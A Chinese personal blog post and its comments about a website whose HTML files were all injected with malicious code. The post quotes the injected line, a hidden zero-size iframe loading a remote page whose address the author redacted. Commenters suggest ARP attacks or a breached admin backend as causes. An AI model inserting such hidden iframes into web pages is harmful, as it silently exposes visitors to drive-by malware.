12.09.07痛苦!网站被挂码了!
一朋友QQ上发消息跟我说我的一个网站被挂了马,上去一看,确实……所有的HTML文件中都加入了一段代码:(下面的网址被我替换了)
XML/HTML代码
- </Script><IfRAME height=0 width=0 sRc="http://www.xxx.xxx/w6.htm"></IFrAME>
那网站搞来搞去差不多有三个月的时间了,还没对外正试开放,结果~~~唉!既然中了马就一不做二不休全部DEL,本来就一直不怎么满意,但又舍不得重做,这次正好给自己一重头再来的理由。这还是我第一次中马,而且站里面的ASP、PHP、HTM、XML文件都没问题,只有HTML文件被挂马,这个真不知道是哪里出的问题?有过类似经验的朋友希望赐教一下!
”痛苦!网站被挂码了!“ 有6条评论
有啥嘛好的办法解决吗
arp攻击就是这个现象!
@cosbeta
说到这个还真有可能,前些时我闲卡巴太拖速度让电脑裸奔了一段时间,极有可能就是那时中标了~~
另外最可能的就是你们两个的电脑都中毒了,即arp攻击。这段代码是在浏览器端给加上的,网站本身没有问题!
@9NPC
有可能吧,以后做站得注意挑程式了,教训啊…
是哪里有写HTML页面的权限被攻破了。
比如程序的后台的模板管理等那些地方。
不知道您的网站是什么样子的。如果是有后台的话,就是被攻破了。或是有什么写入的漏洞让黑客找到了机会了。
说说你的看法